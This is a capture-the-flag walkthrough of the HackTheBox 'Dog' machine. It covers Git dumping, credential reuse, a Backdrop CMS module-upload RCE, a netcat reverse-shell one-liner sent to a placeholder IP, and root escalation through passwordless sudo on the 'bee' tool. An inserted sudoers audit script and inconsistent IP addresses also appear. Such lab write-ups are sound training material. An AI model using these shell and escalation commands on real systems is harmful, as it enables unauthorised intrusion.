HackTheBox | Dog [Easy] Writeup
Author
robeeds
Date Published

Machine Information
IP Address: 10.10.11.58
Guide
Update hosts file
vim /etc/hosts

Run Nmap Scan (Quick)
sudo nmap -sS -sV 10.10.11.68 --stats-every=5s
Results

Visit Webpage

Run Ffuf to view directories
ffuf -w /usr/share/wordlists/common.txt:FUZZ -u http://dog.htb/FUZZ -ic
Results

There is an exposed Git repository. This means that we will be able to view the site's history and development. Reference
Download Git-Dumper
pipx install git-dumper
Run Git-Dumper on Dog
git-dumper http://dog.htb/ git_dump
cd into the git_dump folder
cd git_dump
Listing current directory

There is a settings.php file; view its contents.

Here we have credentials for the root user of the MySQL server.
root:BackDropJ2024DS2024
Let's check the Git logs
git log

Check out the commit using its id.

Now, let's do a quick search for any files that contain account information with the domain 'dog.htb'.

We have more usernames and email accounts we could possibly use to log into the website.

Trying Tiffany's email and the MySQL password lets us log into the dashboard.

Checking User Accounts page

Take a mental note of this for later. Continue looking around for any important information.

Let's see if there are any exploits we can run on this.
searchsploit backdrop

Let's go ahead and gather some more information about the exploit whose version matches the machine's Backdrop instance.
Remote Code Execution
After some light research, I came across this.
Summary of how this exploit works: an authenticated user with permission to upload modules manually can upload malicious PHP code to establish a reverse shell, ultimately leading to remote code execution.
We already have authenticated ourselves as Tiffany, and looking around further, there is a module upload page.

Before we continue, let's create our first attempt at exploiting this box.
Copy the Backdrop 1.27.1 Authenticated RCE exploit
cp /usr/share/exploitdb/exploits/php/webapps/52021.py .
Run the Python script
python 52021.py http://dog.

The module was saved as a zip file, but we saw earlier that there wasn't a zip extension installed. Let's see which archive formats are allowed.
From the browser, click on Manual Installation > Upload a module, theme, or layout archive to install.
It seems that tar, tgz, gz, and bz2 files are allowed. Let's go ahead and recompress the module to be uploaded. The script produced a shell folder, which we will compress in tar format.
tar -cf exploit.tar shell
Now, let's upload this file to the site, and visit its link.

We have a reverse shell from the browser, but I'd like to make this a bit more stable. Let's open a listening port with netcat. In another terminal tab,
nc -lvnp 6666
And in our "shell" in the browser,
python3 -c 'import os; os.system("rm -f /tmp/f;mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP_HERE> 6666 >/tmp/f")'

This shell is still unstable, so let's go ahead and make our terminal experience more tolerable. Reference
Spawn a bash shell through Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
Send this to the background (Ctrl+Z), then
stty raw -echo; fg
Lastly, set the $TERM variable to xterm.
export TERM=xterm
Now, we can see our pwd, clear our terminal, and use arrow keys.
One thing I like to do is to check the home directory.
ls -la /home

There are two users, jobert and johncusack. Listing their directories shows that user.txt exists under johncusack, but I can't view most of the files with cat.
Getting Stuck
I did some thorough investigation all around the file system, seeing if there was anything of use. I found that there was a utility called "Bee" under the root directory '/' (note that this is different from '/root'). Usage of Bee could be found here. I honestly got stuck here, running linpeas and continuing to look around for any ways to escalate my privileges. My last resort was to reuse the MySQL password from earlier on some more of the accounts, which was successful.
Getting the User Flag
I SSH'ed into johncusack's account.
ssh johncusack@dog.htb
Now, we're able to view the User flag.
cat user.txt
Run sudo -l to view permissions.
sudo -l
Re-enter the MySQL password, and we see the following.

We see that johncusack has permission to run the Bee command with sudo, without a password. Having previously viewed its usage, we can use this to spawn a shell as root.
sudo bee --root=/var/www/html eval 'system("/bin/bash");'
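As an added defensive check (not part of the original writeup), the following script parses a sudoers file and flags passwordless rules that hand a user root-level code execution, which is exactly the condition behind the Bee escalation above. The bee path, the sample rules and the list of interpreters are constructed assumptions, not values from the machine.

```python
import re
# Commands that run arbitrary code as root. "bee" is the Backdrop CLI from the
# writeup (its eval subcommand runs PHP); the rest are common interpreters and
# are an assumption of this example, not something the page states.
CODE_EXEC_COMMANDS = {"bee", "php", "python", "python3", "perl", "bash", "sh"}

def parse_rule(line):
    """Parse one sudoers user spec into (user, [(nopasswd, command), ...]);
    returns None for comments, blank lines, Defaults and alias entries."""
    line = line.split("#", 1)[0].strip()
    first = line.split(None, 1)[0] if line else ""
    if not line or "=" not in line or first.startswith("Defaults") or first.endswith("_Alias"):
        return None
    lhs, _, rhs = line.partition("=")
    user = lhs.split()[0]                    # 'johncusack ALL' -> 'johncusack'
    rhs = re.sub(r"\([^)]*\)", "", rhs)      # drop the (runas) specification
    entries, nopasswd = [], False            # tags persist across commas
    for item in rhs.split(","):
        item = item.strip()
        # Tag prefixes such as 'NOPASSWD:' or 'PASSWD:' apply to later items too.
        while ":" in item and item.split(":", 1)[0].strip().isalpha():
            tag, item = (s.strip() for s in item.split(":", 1))
            if tag.upper() in ("NOPASSWD", "PASSWD"):
                nopasswd = tag.upper() == "NOPASSWD"
        if item:
            entries.append((nopasswd, item))
    return user, entries

def audit_sudoers(text):
    """Return [(user, command)] for passwordless rules that hand out code execution."""
    findings = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, entries = parsed
        for nopasswd, cmd in entries:
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # '/usr/local/bin/bee' -> 'bee'
            if nopasswd and (cmd == "ALL" or binary in CODE_EXEC_COMMANDS):
                findings.append((user, cmd))
    return findings

# Constructed sample sudoers; the bee path is assumed, the page does not give it.
SAMPLE_SUDOERS = """\
Defaults env_reset
root        ALL=(ALL:ALL) ALL
%sudo       ALL=(ALL:ALL) ALL
jobert      ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
johncusack  ALL=(ALL) NOPASSWD: /usr/local/bin/bee
"""
```

Running audit_sudoers over /etc/sudoers and the files in /etc/sudoers.d on a host you administer lists every rule that should either require a password or be narrowed to a non-interpreting command.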

Now, we can view the directory and see the contents of root.txt.
cat /root/root.txt